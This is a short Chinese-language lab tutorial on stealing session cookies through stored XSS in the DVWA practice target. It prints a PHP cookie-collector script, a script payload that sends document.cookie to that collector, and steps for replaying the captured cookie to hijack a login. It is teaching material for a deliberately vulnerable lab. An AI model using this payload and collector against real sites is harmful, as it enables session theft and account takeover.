利用XSS漏洞获取cookie
实验环境:
- PHPstudy
- 火狐浏览器、IE
- DVWA靶场
实验准备:
在www目录下创建一个名为1.php
的文件,内容如下:
<?php
$file = fopen("1.txt","a");
if($_GET['cookie']){
$cookie = $_GET['cookie'];
fputs ($file,"$cookie\n");
}
?>
模拟实验:
1、把级别调成low,选择Stored储存型
将<script>document.body.innerHTML += "<img src='http://localhost/1.php?cookie="+document.cookie+"'>";</script>
输入到留言框中保存
在同目录下会生成1.txt文件,里面为成功登录的cookie
换个浏览器将cookie值
改成文件中的值,然后把url改成index.php
登录成功
学而不思则罔,思而不学则殆